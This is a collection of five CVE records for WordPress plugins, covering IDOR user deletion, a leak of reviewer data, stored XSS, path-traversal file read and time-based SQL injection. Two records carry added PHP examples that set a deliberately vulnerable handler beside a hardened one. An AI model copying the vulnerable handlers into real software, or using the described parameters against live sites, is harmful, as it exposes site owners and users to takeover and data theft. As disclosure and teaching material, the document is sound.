WCFM – Frontend Manager for WooCommerce along with Bookings Subscription Listings Compatible <= 6.7.25 - Authenticated (Vendor+) Insecure Direct Object Reference to Arbitrary User Deletion
Summary
The WCFM – Frontend Manager for WooCommerce along with Bookings Subscription Listings Compatible plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 6.7.25 via the 'wcfm_delete_wcfm_customer' due to missing validation on the 'customerid' user controlled key. This makes it possible for authenticated attackers, with Vendor-level access and above, to delete arbitrary users, including Administrators.
CWE
  • CWE-639 - Authorization Bypass Through User-Controlled Key
Assigner
Impacted products
Credits
Supakiad S.

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-2554",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-05T00:27:51.784740Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-05T00:28:04.886Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "WCFM \u2013 Frontend Manager for WooCommerce",
          "vendor": "wclovers",
          "versions": [
            {
              "lessThanOrEqual": "6.7.25",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Supakiad S."
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The WCFM \u2013 Frontend Manager for WooCommerce along with Bookings Subscription Listings Compatible plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 6.7.25 via the \u0027wcfm_delete_wcfm_customer\u0027 due to missing validation on the \u0027customerid\u0027 user controlled key. This makes it possible for authenticated attackers, with Vendor-level access and above, to delete arbitrary users, including Administrators."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-639",
              "description": "CWE-639 Authorization Bypass Through User-Controlled Key",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-02T13:26:09.653Z",
        "orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
        "shortName": "Wordfence"
      },
      "references": [
        {
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/21e397a4-0b32-4b13-a46b-c465acea0796?source=cve"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/wc-frontend-manager/tags/6.7.24/core/class-wcfm-customer.php#L386"
        },
        {
          "url": "https://plugins.trac.wordpress.org/changeset/3483695/"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2026-02-15T17:35:31.000Z",
          "value": "Vendor Notified"
        },
        {
          "lang": "en",
          "time": "2026-05-01T00:00:00.000Z",
          "value": "Disclosed"
        }
      ],
      "title": "WCFM \u2013 Frontend Manager for WooCommerce along with Bookings Subscription Listings Compatible \u003c= 6.7.25 - Authenticated (Vendor+) Insecure Direct Object Reference to Arbitrary User Deletion"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
    "assignerShortName": "Wordfence",
    "cveId": "CVE-2026-2554",
    "datePublished": "2026-05-02T13:26:09.653Z",
    "dateReserved": "2026-02-15T17:16:55.850Z",
    "dateUpdated": "2026-05-05T00:28:04.886Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}
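The WCFM record is an object-level authorisation failure: the handler confirms that the caller is a logged-in vendor but never asks whether the `customerid` it was handed is a customer that vendor may act on, so the same request with an administrator's user ID deletes the administrator. The following is an added example, not WCFM code: a hypothetical "delete customer" handler in the vulnerable shape beside a hardened one. Assume WordPress has already checked the login and a nonce; the users, roles and vendor-to-customer map are constructed stand-ins, as are the `function_exists` shims for the WordPress calls.

```php
<?php
// Added example, not WCFM code: a "delete customer" handler reachable by a
// logged-in vendor. Login and nonce are assumed already checked; what the
// vulnerable version lacks is object-level authorisation on the submitted
// customerid. Users, roles and the vendor-to-customer map are constructed.
$GLOBALS['sim'] = [
    'users'     => [1 => 'administrator', 7 => 'vendor', 8 => 'vendor', 42 => 'customer', 43 => 'customer'],
    'customers' => [7 => [42], 8 => [43]],   // vendor id => ids of its own customers
    'current'   => 7,                         // the logged-in vendor
];
if (!function_exists('get_current_user_id')) {
    function get_current_user_id(): int
    {
        return $GLOBALS['sim']['current'];
    }
}
if (!function_exists('user_can')) {
    // Stand-in: only administrators hold any capability asked about here.
    function user_can(int $user_id, string $cap): bool
    {
        return ($GLOBALS['sim']['users'][$user_id] ?? '') === 'administrator';
    }
}
if (!function_exists('wp_delete_user')) {
    function wp_delete_user(int $user_id): bool
    {
        if (!isset($GLOBALS['sim']['users'][$user_id])) {
            return false;
        }
        unset($GLOBALS['sim']['users'][$user_id]);
        return true;
    }
}

// Vulnerable: the identifier from the request is the only input to the delete.
function delete_customer_vulnerable(array $post): bool
{
    $customer_id = (int) ($post['customerid'] ?? 0);
    return wp_delete_user($customer_id);
}

// Hardened: the caller may act only on objects it owns, and never on a more
// privileged account regardless of what the ownership table says.
function delete_customer_hardened(array $post): bool
{
    $customer_id = (int) ($post['customerid'] ?? 0);
    $vendor_id   = get_current_user_id();
    if ($customer_id <= 0 || $customer_id === $vendor_id) {
        return false;
    }
    $owned = $GLOBALS['sim']['customers'][$vendor_id] ?? [];
    if (!in_array($customer_id, $owned, true)) {
        return false;    // not this vendor's customer: deny, and log the attempt
    }
    if (user_can($customer_id, 'manage_options')) {
        return false;    // privilege ceiling: a vendor never removes an admin
    }
    return wp_delete_user($customer_id);
}

// Constructed requests from vendor 7: the administrator, another vendor's
// customer, and its own customer. State is reset between runs.
foreach ([1, 43, 42] as $target) {
    $req    = ['customerid' => (string) $target];
    $before = $GLOBALS['sim']['users'];
    $h = delete_customer_hardened($req);
    $GLOBALS['sim']['users'] = $before;
    $v = delete_customer_vulnerable($req);
    $GLOBALS['sim']['users'] = $before;
    printf("customerid=%-3d vulnerable deletes: %-3s hardened deletes: %s\n",
        $target, $v ? 'yes' : 'no', $h ? 'yes' : 'no');
}
```

The ownership lookup is the part that has to come from the plugin's own data model (here a vendor-to-customer table); a capability check alone, such as `current_user_can('delete_users')`, would be wrong in the other direction, since vendors legitimately lack it yet are meant to remove their own customers. The privilege-ceiling check is defence in depth against a data bug that lists an administrator as somebody's customer.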

CVE-2026-3504 (GCVE-0-2026-3504)

Vulnerability from cvelistv5 – Published: 2026-05-02 13:26 – Updated: 2026-05-04 14:18
Title
Dokan: AI Powered WooCommerce Multivendor Marketplace Solution <= 4.3.1 - Unauthenticated Information Disclosure in Store Reviews REST API Endpoint
Summary
The Dokan: AI Powered WooCommerce Multivendor Marketplace Solution plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.1 via the '/dokan/v1/stores/{id}/reviews' REST API endpoint. This is due to the 'prepare_reviews_for_response' method including reviewer email addresses, usernames, and user IDs in the API response. This makes it possible for unauthenticated attackers to extract email addresses, usernames, and user IDs of all customers who left reviews on any vendor's store. The Pro version of the plugin must be installed and activated, with store reviews enabled, in order to exploit the vulnerability.
CWE
  • CWE-200 - Exposure of Sensitive Information to an Unauthorized Actor
Assigner
Credits
Rafshanzani Suhada

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-3504",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-04T14:18:11.287105Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-04T14:18:51.266Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Dokan: AI Powered WooCommerce Multivendor Marketplace Solution \u2013 Build Your Own Amazon, eBay, Etsy",
          "vendor": "dokaninc",
          "versions": [
            {
              "lessThanOrEqual": "4.3.1",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Rafshanzani Suhada"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The Dokan: AI Powered WooCommerce Multivendor Marketplace Solution plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.1 via the \u0027/dokan/v1/stores/{id}/reviews\u0027 REST API endpoint. This is due to the \u0027prepare_reviews_for_response\u0027 method including reviewer email addresses, usernames, and user IDs in the API response. This makes it possible for unauthenticated attackers to extract email addresses, usernames, and user IDs of all customers who left reviews on any vendor\u0027s store. The Pro version of the plugin must be installed and activated, with store reviews enabled, in order to exploit the vulnerability."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-200",
              "description": "CWE-200 Exposure of Sensitive Information to an Unauthorized Actor",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-02T13:26:09.111Z",
        "orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
        "shortName": "Wordfence"
      },
      "references": [
        {
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/02b0d7d7-8a10-48de-b1e1-7e1f1fda6ffe?source=cve"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/dokan-lite/trunk/includes/REST/StoreController.php#L125"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/dokan-lite/trunk/includes/REST/StoreController.php#L835"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/dokan-lite/trunk/includes/REST/StoreController.php#L854"
        },
        {
          "url": "https://plugins.trac.wordpress.org/changeset/3481799/"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2026-03-04T00:55:47.000Z",
          "value": "Vendor Notified"
        },
        {
          "lang": "en",
          "time": "2026-05-01T00:00:00.000Z",
          "value": "Disclosed"
        }
      ],
      "title": "Dokan: AI Powered WooCommerce Multivendor Marketplace Solution \u003c= 4.3.1 - Unauthenticated Information Disclosure in Store Reviews REST API Endpoint"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
    "assignerShortName": "Wordfence",
    "cveId": "CVE-2026-3504",
    "datePublished": "2026-05-02T13:26:09.111Z",
    "dateReserved": "2026-03-04T00:40:30.086Z",
    "dateUpdated": "2026-05-04T14:18:51.266Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}
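The Dokan record is an API-shaping failure rather than an access-control one: the reviews endpoint is meant to be public, but `prepare_reviews_for_response` passed the joined reviewer row through, so every visitor could harvest the e-mail, username and user ID of every reviewer. The following is an added example, not Dokan code: a response shaper that returns storage rows as-is, beside one that builds the public representation from an explicit allow-list and exposes account identifiers only to a caller holding a user-management capability. The review rows, field names and the `edit_users` gate are constructed assumptions; the `current_user_can` shim stands in for WordPress.

```php
<?php
// Added example, not Dokan code: shaping a public REST response for store
// reviews. The vulnerable shaper returns the joined reviewer row as-is; the
// hardened one returns an allow-list and gates account identifiers behind a
// capability. Rows and field names are constructed.
if (!function_exists('current_user_can')) {
    function current_user_can(string $cap): bool
    {
        return in_array($cap, $GLOBALS['sim_caps'] ?? [], true);
    }
}

// Rows as a query joining reviews to the users table might return them.
const REVIEW_ROWS = [
    ['id' => 11, 'rating' => 5, 'content' => 'Fast shipping',
     'reviewer' => ['id' => 42, 'login' => 'alice', 'email' => 'alice@example.test', 'display_name' => 'Alice']],
    ['id' => 12, 'rating' => 2, 'content' => 'Wrong size',
     'reviewer' => ['id' => 43, 'login' => 'bob.k', 'email' => 'bob@example.test', 'display_name' => 'Bob']],
];

// Vulnerable: the storage representation *is* the API representation.
function prepare_reviews_vulnerable(array $rows): array
{
    return $rows;
}

// Hardened: an explicit allow-list per field. Identifiers that let a caller
// enumerate or phish accounts appear only for callers allowed to see users.
function prepare_reviews_hardened(array $rows): array
{
    $can_see_users = current_user_can('edit_users');
    $out = [];
    foreach ($rows as $row) {
        $reviewer = ['display_name' => $row['reviewer']['display_name']];
        if ($can_see_users) {
            $reviewer['id']    = $row['reviewer']['id'];
            $reviewer['login'] = $row['reviewer']['login'];
            $reviewer['email'] = $row['reviewer']['email'];
        }
        $out[] = [
            'id'       => $row['id'],
            'rating'   => $row['rating'],
            'content'  => $row['content'],
            'reviewer' => $reviewer,
        ];
    }
    return $out;
}

// Reusable check: does a decoded JSON body expose a given key anywhere?
// Point it at json_decode()'d output of an unauthenticated curl against any
// endpoint to catch the same class of leak before a researcher does.
function response_exposes(array $data, string $key): bool
{
    foreach ($data as $k => $v) {
        if ($k === $key || (is_array($v) && response_exposes($v, $key))) {
            return true;
        }
    }
    return false;
}

$GLOBALS['sim_caps'] = [];   // anonymous caller
$bodies = [
    'vulnerable' => prepare_reviews_vulnerable(REVIEW_ROWS),
    'hardened'   => prepare_reviews_hardened(REVIEW_ROWS),
];
foreach ($bodies as $name => $body) {
    printf("%-10s exposes email=%s login=%s\n", $name,
        var_export(response_exposes($body, 'email'), true),
        var_export(response_exposes($body, 'login'), true));
}
```

In a WordPress REST controller the allow-list normally lives in `get_item_schema()` with per-field `context` values (`view` versus `edit`) and the shaper reads the requested context; the effect is the same as the explicit branch above. The user ID is gated too, not only the e-mail: on its own it feeds `?author=N` and REST user lookups, which is the enumeration step the record's "usernames and user IDs" wording points at.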

CVE-2026-6817 (GCVE-0-2026-6817)

Vulnerability from cvelistv5 – Published: 2026-05-02 11:16 – Updated: 2026-05-04 13:13
Title
Quiz Maker by AYS <= 6.7.1.29 - Unauthenticated Stored Cross-Site Scripting via 'rate_reason'
Summary
The Quiz Maker by AYS plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'rate_reason' parameter in all versions up to, and including, 6.7.1.29 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
CWE
  • CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
Impacted products
Vendor: ays-pro
Product: Quiz Maker by AYS
Versions: affected from 0 to ≤ 6.7.1.29 (semver)
Credits
CHOIGYEONGMIN

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-6817",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-04T13:13:36.072029Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-04T13:13:42.636Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Quiz Maker by AYS",
          "vendor": "ays-pro",
          "versions": [
            {
              "lessThanOrEqual": "6.7.1.29",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "CHOIGYEONGMIN"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The Quiz Maker by AYS plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u0027rate_reason\u0027 parameter in all versions up to, and including, 6.7.1.29 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 5.8,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-79",
              "description": "CWE-79 Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-02T11:16:11.734Z",
        "orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
        "shortName": "Wordfence"
      },
      "references": [
        {
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/fa995fa9-5fb1-434a-bf88-c60e986c45eb?source=cve"
        },
        {
          "url": "https://plugins.trac.wordpress.org/changeset/3513370/quiz-maker"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2026-04-21T19:28:02.000Z",
          "value": "Vendor Notified"
        },
        {
          "lang": "en",
          "time": "2026-05-01T21:36:24.000Z",
          "value": "Disclosed"
        }
      ],
      "title": "Quiz Maker by AYS \u003c= 6.7.1.29 - Unauthenticated Stored Cross-Site Scripting via \u0027rate_reason\u0027"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
    "assignerShortName": "Wordfence",
    "cveId": "CVE-2026-6817",
    "datePublished": "2026-05-02T11:16:11.734Z",
    "dateReserved": "2026-04-21T19:12:46.602Z",
    "dateUpdated": "2026-05-04T13:13:42.636Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2026-6320 (GCVE-0-2026-6320)

Vulnerability from cvelistv5 – Published: 2026-05-02 11:16 – Updated: 2026-05-04 15:37
Title
Salon Booking System – Free Version <= 10.30.25 - Unauthenticated Arbitrary File Read via Booking File Field Path Traversal
Summary
The Salon Booking System – Free Version plugin for WordPress is vulnerable to Arbitrary File Read in versions up to, and including, 10.30.25. This is due to the public booking flow accepting attacker-controlled file-field values and later using those stored values as trusted paths for email attachments. This makes it possible for unauthenticated attackers to read arbitrary local files and exfiltrate them via booking confirmation email attachments.
CWE
  • CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Assigner
Impacted products
Vendor: wordpresschef
Product: Salon Booking System – Free Version
Version: Affected: 0, ≤ 10.30.25 (semver)
Credits
daroo

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-6320",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-04T15:34:22.000373Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-04T15:37:04.821Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Salon Booking System \u2013 Free Version",
          "vendor": "wordpresschef",
          "versions": [
            {
              "lessThanOrEqual": "10.30.25",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "daroo"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The Salon Booking System \u2013 Free Version plugin for WordPress is vulnerable to Arbitrary File Read in versions up to, and including, 10.30.25. This is due to the public booking flow accepting attacker-controlled file-field values and later using those stored values as trusted paths for email attachments. This makes it possible for unauthenticated attackers to read arbitrary local files and exfiltrate them via booking confirmation email attachments."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22 Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-02T11:16:11.330Z",
        "orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
        "shortName": "Wordfence"
      },
      "references": [
        {
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e91b8082-e1c7-4989-82db-20e255b52854?source=cve"
        },
        {
          "url": "https://plugins.trac.wordpress.org/changeset/3512110/salon-booking-system"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2026-05-01T21:28:03.000Z",
          "value": "Disclosed"
        }
      ],
      "title": "Salon Booking System \u2013 Free Version \u003c= 10.30.25 - Unauthenticated Arbitrary File Read via Booking File Field Path Traversal"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
    "assignerShortName": "Wordfence",
    "cveId": "CVE-2026-6320",
    "datePublished": "2026-05-02T11:16:11.330Z",
    "dateReserved": "2026-04-14T20:18:15.555Z",
    "dateUpdated": "2026-05-04T15:37:04.821Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2026-4061 (GCVE-0-2026-4061)

Vulnerability from cvelistv5 – Published: 2026-05-02 11:16 – Updated: 2026-05-04 14:58
Title
Geo Mashup <= 1.13.18 - Unauthenticated Time-Based SQL Injection via 'map_post_type' Parameter
Summary
The Geo Mashup plugin for WordPress is vulnerable to Time-Based SQL Injection via the 'map_post_type' parameter in all versions up to, and including, 1.13.18. This is due to the `SearchResults` hook explicitly calling `stripslashes_deep($_POST)` which removes WordPress magic quotes protection, followed by the unsanitized `map_post_type` value being concatenated into an `IN(...)` clause without `esc_sql()` or `$wpdb->prepare()`. The 'any' branch of the same code correctly applies `array_map('esc_sql', ...)`, but the else branch does not. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database via a time-based blind approach. Exploitation requires the Geo Search feature to be enabled in plugin settings.
CWE
  • CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Assigner
Impacted products
Vendor: cyberhobo
Product: Geo Mashup
Version: Affected: 0, ≤ 1.13.18 (semver)
Credits
Naoya Takahashi

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-4061",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-04T14:58:03.561286Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-04T14:58:15.863Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Geo Mashup",
          "vendor": "cyberhobo",
          "versions": [
            {
              "lessThanOrEqual": "1.13.18",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Naoya Takahashi"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The Geo Mashup plugin for WordPress is vulnerable to Time-Based SQL Injection via the \u0027map_post_type\u0027 parameter in all versions up to, and including, 1.13.18. This is due to the `SearchResults` hook explicitly calling `stripslashes_deep($_POST)` which removes WordPress magic quotes protection, followed by the unsanitized `map_post_type` value being concatenated into an `IN(...)` clause without `esc_sql()` or `$wpdb-\u003eprepare()`. The \u0027any\u0027 branch of the same code correctly applies `array_map(\u0027esc_sql\u0027, ...)`, but the else branch does not. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database via a time-based blind approach. Exploitation requires the Geo Search feature to be enabled in plugin settings."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-89",
              "description": "CWE-89 Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-02T11:16:10.948Z",
        "orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
        "shortName": "Wordfence"
      },
      "references": [
        {
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cc3cf6c5-643e-49ca-b09c-bd7cfec328ee?source=cve"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/geo-mashup/trunk/geo-mashup-db.php#L1748"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/geo-mashup/trunk/php/Hooks/SearchResults.php#L39"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/geo-mashup/trunk/php/Search.php#L152"
        },
        {
          "url": "https://plugins.trac.wordpress.org/changeset/3503627/"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2026-03-12T17:48:47.000Z",
          "value": "Vendor Notified"
        },
        {
          "lang": "en",
          "time": "2026-05-01T00:00:00.000Z",
          "value": "Disclosed"
        }
      ],
      "title": "Geo Mashup \u003c= 1.13.18 - Unauthenticated Time-Based SQL Injection via \u0027map_post_type\u0027 Parameter"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
    "assignerShortName": "Wordfence",
    "cveId": "CVE-2026-4061",
    "datePublished": "2026-05-02T11:16:10.948Z",
    "dateReserved": "2026-03-12T17:28:38.631Z",
    "dateUpdated": "2026-05-04T14:58:15.863Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}